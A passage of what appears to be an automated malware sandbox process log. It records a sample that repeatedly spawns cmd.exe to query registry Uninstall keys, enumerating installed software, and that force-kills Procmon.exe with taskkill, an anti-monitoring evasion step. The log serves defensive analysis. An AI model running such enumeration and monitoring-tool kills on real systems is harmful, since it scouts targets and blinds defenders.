C:\Windows\system32\cmd.execmd.exe2⤵PID:2792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:2816
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2828
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:2872
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:2884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:2916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:2948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:2980
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:2992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:3052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2116
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2188
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:2232
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:2308
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:2368
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2364
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:2416
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:2412
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:2548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:2580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1852
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1048
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:1004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2596
-